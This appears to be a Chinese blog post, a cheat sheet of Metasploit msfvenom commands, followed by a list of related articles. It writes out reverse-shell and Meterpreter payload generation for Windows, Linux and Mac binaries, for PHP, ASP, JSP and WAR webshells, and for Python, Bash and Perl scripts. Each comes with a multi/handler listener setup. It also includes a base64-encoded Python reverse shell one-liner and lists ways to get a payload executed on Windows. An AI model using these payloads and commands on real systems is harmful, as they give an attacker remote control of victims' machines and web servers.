msf常用payload
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。
在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:
msfvenom -l
![](/assets/blank.gif)
生成二进制文件
关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> -f macho > shell.macho
如何利用
针对这个部分就以Windows为例,使用上面的命令生成一个exe的payload,命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f exe > shell.exe
![](/assets/blank.gif)
复制shell.exe到Windows机器,然后kali下开启msf使用如下命令监听4444端口:
- msfconsole
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.88.128
- set LPORT 4444
- set ExitOnSession false
- exploit -j -z
执行完之后在Windows下执行shell.exe,然后结果如图:
在这里既然使用到了在Windows下执行应用程序,我们就大概盘点一下在Windows执行应用程序的几种方式:
双击运行
cmd下运行exe
利用Powershell远程下载执行
利用at或schtasks设置计划任务执行
利用wmic远程命令执行
其他的方式请各位补充
![](/assets/blank.gif)
生成webshell脚本
在做web渗透的时候,经常会用到webshell,我们经常用的一句话用菜刀连接,如何使用MSFVenom生成一个可以用msf操作的webshell呢?
PHP
- msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
- cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
如何利用
下面以php为例做一下测试,使用以下命令生成一个webshell:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f raw > shell.php
在kali上使用msf执行下面的命令,监听端口4444:
- msfconsole
- use exploit/multi/handler
- set PAYLOAD php/meterpreter_reverse_tcp
- set LHOST 192.168.88.128
- set LPORT 4444
- set ExitOnSession false
- exploit -j -z
将shell.php放在web目录下,使用浏览器访问,或者使用以下命令执行:
php shell.php
![](/assets/blank.gif)
脚本shell
关于使用脚本反弹shell的方式,主要以python、bash、perl为例。
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
如何使用
下面就以Python为例做一下测试,使用以下命令生成一个脚本:
msfvenom -p cmd/unix/reverse_python LHOST=192.168.88.128 LPORT=4444 -f raw > shell.py
- msfconsole
- use exploit/multi/handler
- set PAYLOAD cmd/unix/reverse_python
- set LHOST 192.168.88.128
- set LPORT 4444
- set ExitOnSession false
- exploit -j -z
然后复制shell.py中的内容在linux命令行下执行,如下:
python -c"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
结果如图:
![](/assets/blank.gif)
msf常用payload相关推荐
- 【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)
目录 一.简介: 二.下载: 2.1.kali 2.2.官网: 2.3.GitHub: 三.启动方法 四.msf常用基础命令 五.msf结构 六. 核心命令: 一.简介: 很容易地获取.开发并对计算机 ...
- msf注入payload
msf注入payload bash 参考文章 bash use exploit/windows/local/payload_inject set payload windows/meterpreter ...
- msf生成payload大全
前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog CTF-专栏:https://blog.csdn.net ...
- 【Metasploit总结】之【MSF常用命令及信息收集】
操作系统:kali Linux2020.3 smfconsole常用命令 msfconsole下可以直接使用终端命令,如ping等 msfdb start # 启动msf数据库,msf数据库默认使用的 ...
- 【Metasploit】MSF常用命令
Meterpreter基本概念 Meterpreter是Metasploit框架中的一个扩展模块,在攻击成 功以后给我们返回一个控制通道,是metsploit后渗透必不可少的 ,它具有强大的功能,包括 ...
- msf常用模块功能整理
更新中 一.基础: shell中直接输入msfconsole开始运行 use +模块路径 使用模块 search+模块关键字 用来搜索模块 back 返回主界面 模块中: info 查看模块信息 sh ...
- 永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
环境部署 靶机:win7(172.168.100.158) 工具机:kali,nessus 攻击步骤 1.nessus扫描靶机 2.根据扫描结果查看靶机漏洞 3.发现靶机存在永恒之蓝(MS17-010 ...
- MSF常用的监听模块命令
msfpayload 命令 帮助 msfpayload -h 列出所有可用的***载荷 msfpayload windows/meterpreter/bind_tcp O 列出所有windows/me ...
- XSS常用Payload
1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt> 2.绕过htm ...
最新文章
- C++11中Lambda表达式的使用
- R语言使用caret包对GBM模型进行参数调优实战:Model Training and Parameter Tuning
- wordpress图片水印插件DX-Watermark
- strcpy和strncpy
- 阅读react-redux源码 - 一
- 复合的赋值运算符例题_Java学习:运算符的使用与注意事项
- Docker制作镜像(四)
- php验证码类Validationcode
- Swagger 属性名 FastJson支持,@ApiModelProperty无法序列化
- BZOJ 1901 洛谷 P2617 ZOJ 2112 Dynamic Rankings
- gxworks2软件测试对话框,超实用!GX Works2软件的启动与窗口功能应用
- ZigBee Zstack协议栈
- MacBook快捷键
- ❤️「Python」初阶,必看系列, 万字只为你,建议点赞收藏~❤️
- 驱动开发:Win10枚举完整SSDT地址表
- 技术岗找工作简历撰写方法
- 商城-下单-订单结算页
- icc 颜色 c语言,浅析颜色在icc中四种不同的转换方式
- 微信中html5获取手机号,微信小程序用户授权获取手机号(getPhoneNumber)
- 长虹应用商店服务器连接异常,长虹电视为什么应用商店打不开,上面显示服务器或网络异常,可是网络没问题,还显示sn异常,求解……...
热门文章
- Oracle数据类型-CLOB
- Nanoprobes丨EnzMet 用于免疫组织化学 (IHC) 和印迹
- android13新版本适配
- 中信建投计算机研究武超则,中信建投证券--计算机行业:华为投资鲲鹏产业生态,加速国产化进程(4页)-原创力文档...
- php和c#短信接口,C#代码示例_C#验证码短信接口 | 微米-中国领先的短信彩信接口平台服务商...
- Java中Runtime类详细总结
- 我的人生感悟---献给像我这样走在路上的人,免走弯路!
- 微信小程序模拟器在笔记本上input无法获取焦点,无法输入
- 工业互联网也迈入新的发展阶段 AI助力构建新型制造体系
- 第6章 Linux目录文件与系统启动知识